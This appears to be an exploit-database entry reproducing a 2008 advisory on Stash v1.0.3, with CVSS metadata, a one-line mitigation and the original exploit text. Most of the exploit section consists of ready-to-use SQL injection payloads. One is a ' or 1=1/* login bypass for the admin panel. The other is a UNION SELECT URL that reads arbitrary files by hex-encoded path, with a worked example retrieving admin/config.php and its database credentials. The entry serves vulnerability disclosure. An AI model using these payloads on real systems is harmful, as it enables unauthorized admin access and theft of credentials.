Stash v1.0.3 Admin bypass / Remote File Disclosure

vendor:

Stash

by:

IRCRASH (R3d.W0rm (Sina Yazdanmehr))

7.5

CVSS

HIGH

Admin bypass / Remote File Disclosure

287

CWE

Product Name: Stash

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: N/A

CPE: stash:stash:1.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Stash v1.0.3 Admin bypass / Remote File Disclosure

A vulnerability in Stash v1.0.3 allows an attacker to bypass the authentication process and gain access to the admin panel. Additionally, the attacker can also access the config.php file which contains sensitive information such as database credentials.

Mitigation:

Upgrade to the latest version of Stash and ensure that the admin panel is protected with strong authentication.

Source

Exploit-DB raw data:

#####################################################################################
####           Stash v1.0.3 Admin bypass / Remote File Disclosure                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#                                                                                   #
#DORK : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                [Admin by pass]                                    #
#                                                                                   #
#http://Site/[path]/admin/login                                                     #
#Username : ' or 1=1/*                                                              #
#Password : R3d.W0rm                                                                #
#                                                                                   #
#####################################################################################
#                            [Remote File Disclosure]                               #
#                                                                                   #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* 
#                                                                                   #
#Note : You must enter file name in hex in valun address to download it .           #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870         #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* 
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-09-09]